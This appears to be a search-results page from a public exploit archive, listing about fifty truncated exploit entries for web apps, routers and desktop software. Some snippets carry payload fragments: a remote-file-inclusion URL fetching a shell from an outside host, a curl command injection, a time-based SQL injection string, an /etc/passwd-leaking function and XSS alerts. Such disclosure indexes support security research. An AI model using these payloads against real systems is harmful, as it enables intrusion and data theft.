47904 matches found
ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation
Exploit Title: ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation Date: 31.01.2021 Exploit Author: LiquidWorm Vendor Homepage: http://www.zblchina.com http://www.wd-thailand.com Vendor: Zhejiang BC&TV Technology Co., Ltd. ZBL | W&D Corporation WAD TECHNOLOGY THAILAND Product web page...
Student Record System 4.0 - 'cid' SQL Injection
Exploit Title: Student Record System 4.0 - 'cid' SQL Injection Date: 2/2/2021 Exploit Author: Jannick Tiger Vendor Homepage: https://phpgurukul.com/ Software Link: https://phpgurukul.com/wp-content/uploads/2019/05/schoolmanagement.zip Version: V 4.0 Tested on: Windows、XAMPP Identify the...
Latrix 0.6.0 - 'txtaccesscode' SQL Injection
Exploit Title: Latrix 0.6.0 – 'txtaccesscode' SQL Injection Date: 03/30/2021 Exploit Author: cptsticky Vendor Homepage: https://sourceforge.net/projects/latrix Software Link: https://sourceforge.net/projects/latrix/files/latest/download Version: 0.6.0 Tested on: Ubuntu 20.04 POST...
OpenCTI 3.3.1 - Directory Traversal
Exploit Title: OpenCTI 3.3.1 - Directory Traversal Date: 2020-03-05 Exploit Author: Raif Berkay Dincel Vendor Homepage: www.opencti.io/ Software https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1 Version: 3.3.1 CVE-ID: N/A Tested on: Linux Mint / Windows 10 Vulnerabilities Discovered...
Online Matrimonial Project 1.0 - Authenticated Remote Code Execution
Exploit Title: Online Matrimonial Project 1.0 - Authenticated Remote Code Execution Exploit Author: Valerio Alessandroni Date: 2020-10-07 Vendor Homepage: https://projectworlds.in/ Software Link: https://projectworlds.in/free-projects/php-projects/online-matrimonial-project-in-php/ Source Link:...
Fast PHP Chat 1.3 - 'my_item_search' SQL Injection
Exploit Title: Fast PHP Chat 1.3 - 'myitemsearch' SQL Injection Date: 15/04/2021 Exploit Author: Fatih Coskun Vendor Homepage: https://codecanyon.net/item/fast-php-chat-responsive-live-ajax-chat/10721076 Version: 1.3 Category: Webapps Tested on: Kali linux Description : The vulnerability allows a...
iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path
Exploit Title: iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path Date: 2021-06-18 Exploit Author: Julio Aviña Vendor Homepage: https://www.i-funbox.com/en/index.html Software Link: https://www.i-funbox.com/download/ifunboxsetup4.2.exe Version: 4.2 Service File Version: 486.0.2.23...
ThinkAdmin 6 - Arbitrarily File Read
Exploit Title: ThinkAdmin 6 - Arbitrarily File Read Google Dork: N/A Date: 2020-09-14 Exploit Author: Hzllaga Vendor Homepage: https://github.com/zoujingli/ThinkAdmin/ Software Link: Before https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784effbf72a2a386c5d25c43a9a Version: v6 =...
Responsive Online Blog 1.0 - 'id' SQL Injection
Exploit Title: Responsive Online Blog 1.0 - 'id' SQL Injection Date: 2020-06-23 Exploit Author: Eren Şimşek Vendor Homepage: https://www.sourcecodester.com/php/14194/responsive-online-blog-website-using-phpmysql.html Software Link:...
elearning-script 1.0 - Authentication Bypass
Exploit Title: elearning-script 1.0 - Authentication Bypass Author: riamloo Date: 2019-12-29 Vendor Homepage: https://github.com/amitkolloldey/elearning-script Software Link: https://github.com/amitkolloldey/elearning-script/archive/master.zip Version: 1 CVE: N/A Tested on: Win 10 Discription: E...
4images 1.8 - 'limitnumber' SQL Injection (Authenticated)
Exploit Title: 4images 1.8 - 'limitnumber' SQL Injection Authenticated Exploit Author: Andrey Stoykov Software Link: https://www.4homepages.de/download-4images Version: 1.8 Tested on: Linux Source Analysis: Line 658 - User action defined if $action == "findimages" Line 661 - Vulnerable condition...
Blitar Tourism 1.0 - Authentication Bypass SQLi
Exploit Title: Blitar Tourism 1.0 - Authentication Bypass SQLi Date: 13 April 2021 Exploit Author: sigeri94 Vendor Homepage: https://sourcecodeaplikasi.info/source-code-aplikasi-biro-travel-berbasis-web/ Software Link: https://codeload.github.com/satndy/Aplikasi-Biro-Travel/zip/master Version: 1....
Nxlog Community Edition 2.10.2150 - DoS (Poc)
Exploit Title: Nxlog Community Edition 2.10.2150 - DoS Poc Date: 15/12/2020 Exploit Author: Guillaume PETIT Vendor Homepage: https://nxlog.co Software Link: https://nxlog.co/products/nxlog-community-edition/download Version: 2.10.2150 Tested on: Linux Debian 10 && Windows Server 2019 CVE:...
DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated)
Exploit Title: DynPG 4.9.1 - Persistent Cross-Site Scripting Authenticated Date: 2020-10-09 Exploit Author: Enes Özeser Vendor Homepage: https://dynpg.org/ Version: 4.9.1 Tested on: Windows & XAMPP == Tutorial alert"XSS"; == HTTP Request alert"XSS";...
Online Learning System 2.0 - Remote Code Execution (RCE)
Exploit Title: Online Learning System 2.0 - Remote Code Execution RCE Date: 15/11/2021 Exploit Author: djebbaranon Vendor Homepage: https://github.com/oretnom23 Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearningv20.zip Version: 2.0 Tested on: Kali linux...
Eclipse Jetty 11.0.5 - Sensitive File Disclosure
Exploit Title: Eclipse Jetty 11.0.5 - Sensitive File Disclosure Date: 2021-11-03 Exploit Author: Mayank Deshmukh Vendor Homepage: https://www.eclipse.org/jetty/ Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/ Version: 9.4.37 ≤ version ColdFusionX - Web Applicat...
Simple Food Website 1.0 - Authentication Bypass
Exploit Title: Simple Food Website 1.0 - Authentication Bypass Date: 2021-04-03 Exploit Author: Viren Saroha illusion Vendor Homepage: https://www.sourcecodester.com/php/12510/simple-food-website-php.html Software Link:...
osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting
Exploit Title: osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting Date: 2020-06-26 Exploit Author: Matthew Aberegg Vendor Homepage: https://osticket.com Patch Link: https://github.com/osTicket/osTicket/commit/d54cca0b265128f119b6c398575175cb10cf1754 Version: osTicket 1.14.1 Tested o...
Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting
Exploit Title: Jiofi 4 JMR 1140 Reflected Cross Site Scripting Date: 12.02.2019 Exploit Author: Ronnie T Baby Contact:https://www.linkedin.com/in/ronnietbaby Vendor Homepage: www.jio.com Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574 Category: Hardware Wifi Router Version:...
Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)
Exploit Title: Wordpress Plugin Canto " def createadminfilelocaldir, localshell=None: if not os.path.existslocaldir: os...
Nidesoft 3GP Video Converter 2.6.18 - Local Stack Buffer Overflow
Exploit Title: Nidesoft 3GP Video Converter 2.6.18 - Local Stack Buffer Overflow Date: 2020-07-30 Author: Felipe Winsnes Software Link: http://www.nidesoft.com/downloads/3gp-video-converter.exe Version: 2.6.18 Tested on: Windows 7 x86 Blog: https://whitecr0wz.github.io/ Proof of Concept: 1.- Run...
LifeRay 7.2.1 GA2 - Stored XSS
Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS Date: 10/05/2020 Exploit Author: 3ndG4me Vendor Homepage: https://www.liferay.com/ Software Link: https://www.liferay.com/ Version: 7.1.0 - 7.2.1 GA2 REQUIRED Tested on: Debian Linux CVE : CVE-2020-7934 Public Exploit/Whitepaper:...
BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Execution
Exploit Title: Directory Traversal + RCE on BlogEngine.NET Date: 17 Jun 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10720 1. Description ============== BlogEngine.NET is vulnerable to a Directory Traversal through th...
Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit)
This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3 'Webmin /file/show.cgi Remote Command...
Wordpress Core 5.2.2 - 'post previews' XSS
Exploit Title: Wordpress Core 5.2.2 - 'post previews' XSS Date: 31/12/2020 Exploit Author: gx1 Vulnerability Discovery: Simon Scannell Vendor Homepage: https://wordpress.com/ Software Link: https://github.com/WordPress/WordPress Version: = 5.2.2 Tested on: any CVE: CVE-2019-16223 References:...
MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition
/ Source: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit mysql-privesc-race.c ver. 1.0...
Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer Overflow
!/usr/bin/python HP Power Manager Administration Universal Buffer Overflow Exploit CVE 2009-2685 Tested on Win2k3 Ent SP2 English, Win XP Sp2 English Matteo Memelli ryujin A-T offensive-security.com www.offensive-security.com Spaghetti & Pwnsauce - 07/11/2009 ryujin@bt:$ ./hppowermanager.py...
Water Billing System 1.0 - 'username' and 'password' parameters SQL Injection
Exploit Title: Water Billing System 1.0 - 'username' and 'password' parameters SQL Injection SQL Injection in 'username' and 'password' parameters allows attacker to run the SQL commands on the victim to extract entire DB. In advanced exploitation, an attacker can run the arbitrary code on the...
Microsoft Windows - '.LNK' Shortcut File Code Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LNK Remote Code Execution Vulnerability', 'Description' = %q This module exploits a vulnerability in the handling of Windows Shortcut files .LNK...
Elementor Website Builder < 3.12.2 - Admin+ SQLi
EXPLOIT Elementor Website Builder Replace URL page. On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL": code : http://localhost:8080/?test',metakey='key4'where+metaid=SLEEP2; Press "Replace URL" on the Replace URL page. Burp...
Fuel CMS 1.4.1 - Remote Code Execution (3)
Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution 3 Exploit Author: Padsala Trushal Date: 2021-11-03 Vendor Homepage: https://www.getfuelcms.com/ Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 Version: ',epilog=f'EXAMPLE - python3 sys.argv0 -u http://10.10.21.74'...
PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection
Exploit Title: PHP 5.x Shellshock Exploit bypass disablefunctions Google Dork: none Date: 10/31/2014 Exploit Author: Ryan King Starfall Vendor Homepage: http://php.net Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror Version: 5. tested on 5.6.2 Tested on: Debian 7 and CentOS 5 an...
openMAINT 1.1-2.4.2 - Arbitrary File Upload
Exploit Title: openMAINT 1.1-2.4.2 - Arbitrary File Upload Dork: N/A Date: 2020-08-19 Exploit Author: mrb3n Vendor Homepage: https://www.openmaint.org/en Software Link: https://sourceforge.net/projects/openmaint/files/1.1/openmaint-1.1-2.4.2.zip/download Version: 1.1-2.4.2 Category: Webapps Teste...
Netlink GPON Router 1.0.11 - Remote Code Execution
Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution Date: 2020-03-17 Exploit Author: shellord Vendor Homepage: https://www.netlink-india.com/ Version: 1.0.11 Tested on: Windows 10 CVE: N/A Exploit : curl -L -d "targetaddr=;ls /&waninf=1INTERNETRVID154"...
Dnsmasq < 2.78 - 2-byte Heap Overflow
''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14491.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html 1 Build the docker and open three terminals docker build -t dnsmasq . docker run --rm -t -i...
F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion
Exploit Title: F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion Date: 2019-08-17 Exploit Author: Carlos E. Vieira Vendor Homepage: https://www.f5.com/products/big-ip-services Version: 0: return True else: return False else: return False def leakPasswd: print"+ Leaking /etc/passwd from server"...
Microsoft Excel - OLE Arbitrary Code Execution
Title: MS Office Excel all versions Arbitrary Code Execution Vulnerability Date: September 30th, 2017. Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link: https://products.office.com/ Version: 2007,2010,2013,2016 32/64 bits x86 and x64 Tested on: Windows...
WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)
Exploit Title: WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting XSS Date: 4/07/2021 Exploit Author: 3ndG4me Vendor Homepage: https://www.automatedlogic.com/en/products/webctrl-building-automation-system/ Version: 6.5 and Below CVE : CVE-2021-31682 --Summary-- The login portal for the...
Cabot 0.11.12 - Persistent Cross-Site Scripting
Exploit Title: Cabot 0.11.12 - Persistent Cross-Site Scripting Date: 2020-09-06 Exploit Author: Abhiram V Vendor Homepage: https://cabotapp.com/ Software Link: https://github.com/arachnys/cabot Version: 0.11.12 Tested on: Ubuntu Linux Introduction Cabot is a free, open-source, self-hosted...
CoreHTTP 0.5.3.1 - 'CGI' Arbitrary Command Execution
Package name: CoreHTTP server Version: 0.5.3.1 and below as long as cgi support is enabled Software URL: http://corehttp.sourceforge.net/ Exploit: http://aconole.brad-x.com/programs/corehttpcgienabled.rb Issue: CoreHTTP server fails to properly sanitize input before calling popen and allows an...
Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection
Exploit Title: Stock Management System 1.0 - SQL Injection Dork: N/A Date: 2020-10-22 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html Version: 1.0 Tested on: Linux CVE: N/A POC: ...
Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)
Exploit Title: Code Blocks 17.12 - 'File Name' Local Buffer Overflow Unicode SEH PoC Vendor Homepage: http://www.codeblocks.org/ Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download Exploit Author: Paras Bhatia...
OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting
Exploit Title: OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting Date: 2020-05-11 Exploit Author: Vulnerability-Lab Vendor: https://www.openz.de/ https://www.openz.de/download.html Document Title: =============== OpenZ v3.6.60 ERP - Employee Persistent XSS Vulnerability References Source:...
ECSIMAGING PACS 6.21.5 - SQL injection
Exploit Title: ECSIMAGING PACS 6.21.5 - SQL injection Date: 06/01/2021 Exploit Author: shoxxdj Vendor Homepage: https://www.medicalexpo.fr/ Version: 6.21.5 and bellow tested on 6.21.5,6.21.3 Tested on: Linux ECSIMAGING PACS Application in 6.21.5 and bellow suffers from SQLinjection vulnerability...
RDP Manager 4.9.9.3 - Denial-of-Service (PoC)
Exploit Title: RDP Manager 4.9.9.3 - Denial-of-Service PoC Date: 2021-10-18 Exploit Author: Vulnerability Lab Vendor Homepage: https://www.cinspiration.de/uebersicht4.html Software Link: https://www.cinspiration.de/download.html Version: 4.9.9.3 Tested on: Linux Document Title: =============== RD...
Digital Crime Report Management System 1.0 - SQL Injection (Authentication Bypass)
Exploit Title: Digital Crime Report Management System 1.0 - SQL Injection Authentication Bypass Date: 13 April 2021 Exploit Author: Galuh Muhammad Iman Akbar GaluhID Vendor Homepage: https://iwantsourcecodes.com/digital-crime-report-management-system-in-php-with-source-code/ Software Link:...
Medical Center Portal Management System 1.0 - Multiple Stored XSS
Exploit Title: Medical Center Portal Management System 1.0 - Multiple Stored XSS Exploit Author: Saeed Bala Ahmed r0b0tG4nG Date: 2020-12-10 Google Dork: N/A Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html Software Link:...
Aardvark Topsites PHP 4.2.2 - 'path' Remote File Inclusion
Title: Aardvark Topsites PHP 4.2.2 remote file inclusion URL: http://www.aardvarktopsitesphp.com/ Dork: "Powered By Aardvark Topsites PHP 4.2.2" Exploit: /sources/join.php?FORMurl=owned&CONFIGcaptcha=1&CONFIGpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com 2006-04-30...
SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
Exploit Title: SOPlanning 1.52.01 Simple Online Planning Tool - Remote Code Execution RCE Authenticated Date: 6th October, 2024 Exploit Author: Ardayfio Samuel Nii Aryee Version: 1.52.01 Tested on: Ubuntu import argparse import requests import random import string import urllib.parse def...
WordPress Theme Enfold 4.8.3 - Reflected Cross-Site Scripting (XSS)
Exploit Title: WordPress Theme Enfold 4.8.3 - Reflected Cross-Site Scripting XSS Google Dork: "inurl:avia-element-paging" Date: 18/10/2021 Exploit Author: Francisco Díaz-Pache Alonso, Sergio Corral Cristo and David Álvarez Robles Vendor Homepage: https://kriesi.at/ Version: Enfold This URL must...